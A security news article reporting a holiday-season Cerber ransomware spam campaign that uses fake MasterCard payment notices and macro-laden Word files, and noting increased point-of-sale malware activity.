Apparently the Cerber ransomware gang is ready for the holiday season. The criminals have just launched a brand new spam campaign which uses fake credit card reports to trick users into opening a Word file which will download and install Cerber ransomware.
The new spam campaign was registered by the Microsoft Malware Protection Center, who said that this campaign pretend to be pending payments for MasterCard credit cards.
The design of the email is really smart because it plays on everyone’s fear of getting billed for items they haven’t purchased.
The email uses a sense of urgency to trick victims into opening a password-protected Word document that contains instructions on how to cancel this operation.
Most banks send customers password-protected files because email scanning systems and anti-malware products can’t open to scan the email’s attachment.
The file which customers receive with these emails is a Word document that contains an attached macro script. Once the user allows executing the script, it will infect the system with the Cerber ransomware.
When opening the Word document, the users see instructions that resemble a Microsoft tech support page, telling the user to Enable Editing, which allows the macro script to execute.
Unlike the tech-savvy users who stay away from Word files with macro scripts, most regular users just see the message and follow the embedded instructions.
As soon as users allow the macro script to execute, the macro runs a PowerShell script that downloads and installs the Cerber ransomware, which immediately starts encrypting the user’s files.
After seeing a copy of the ransom note, the MalwareHunterTeam stated that the latest version of the Cerber ransomware is currently uncrackable.
So, it’s no wonder that the Cerber gang switch from their classic invoice-themed spam and malvertising campaigns to this fake credit card report.
Some other cybercrime operations have also adopted their tactics and intensified operations for the winter holidays.
According to the Proofpoint team, the activity surrounding the NewPOSthings and ZeusPOS malware families which target Point-of-Sale terminals have quadrupled for the Thanksgiving and the Black Friday sales.